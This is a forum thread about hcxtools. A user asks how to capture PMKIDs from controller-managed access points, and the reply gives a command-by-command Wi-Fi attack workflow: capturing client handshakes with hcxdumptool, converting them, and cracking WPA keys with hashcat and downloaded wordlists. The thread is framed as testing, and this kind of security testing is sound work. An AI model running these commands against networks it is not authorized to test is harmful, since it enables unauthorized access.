Q related to hcxtools
#1
Hi all,

I am testing hcxdumptool in an environment where there are no autonomous wireless access points, but instead a lightweight access point which get there config via a wireless controller. I does not seems to work, because the MAC address of the wireless access point changes anytime. As a result I cannot use a filter to attack a specific wireless access point.

Any advice on how to try to get the PMKID in this situation ?

regards
Damien
Reply
#2
I don't think that this kind of AP is using PMKID caching, because that doesn't make sense if the MAC changes often.
Please notice that the PMKID depend on the MAC:
Code:
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Maybe one of the CLIENTs of this NETWORK is weak (M1M2ROGUE). Try to attack them instead of the hardened AP:
Code:
$ hcdumptool -i INTERFACE -o dumpfile.pcapng --enable_status=23 --active_beacon --stop_client_m2_attacks=100
Run the attack for some hours, to make sure to get as much as possible information from CLIENTs.

If there are other APs or CLIENTs in range that you are not targeting, I recommend to protect them by BPFC.
from --help:
create BPF to protect a MAC
Code:
$ tcpdump -i <interface> not wlan addr1 11:22:33:44:55:66 and not wlan addr2 11:22:33:44:55:66 -ddd > protect.bpf
add all MACs to protect (each MAC as addr1 and addr2) separated by "and not wlan"
and run hcxdumptool with activated BPF:
Code:
$ hcdumptool -i INTERFACE -o dumpfile.pcapng --enable_status=23 --active_beacon --stop_client_m2_attacks=100 --bpfc=protect.bpf

Then convert to hc22000:
Code:
$ hcxpcapngtool -E wl -I wl -U wl --all -o test.hc22000 dumpfile.pcapng
Please notice:
We have to use --all, because NC is currently broken on hashcat.
https://hashcat.net/forum/thread-10253-p...#pid53602l

Now use hashcat on the recorded traffic as a first attempt:
Code:
$ hashcat -m 22000 test.hc22000 wl

proceed with hcxpsktool:
Code:
$ hcxpsktool -c test.hc22000 --weakpass --eudate --usdate --wpskeys | hashcat -m 22000 test.hc22000

proceed with wpa-sec confirmed lists:
Code:
$ wget https://wpa-sec.stanev.org/dict/rkg.txt.gz
$ hashcat -m 22000 test.hc22000 rkg.txt.gz
$ wget https://wpa-sec.stanev.org/dict/cracked.txt.gz
$ hashcat -m 22000 test.hc22000 cracked.txt.gz

If that doesn't work, do some open sources intelligence (OSINT) by DuckDuckGo picture search and try some masks and rules.
This wordlists may be useful, too:
https://3wifi.stascorp.com/3wifi-dic-2021-09-03.7z
https://hashmob.net/downloads
Reply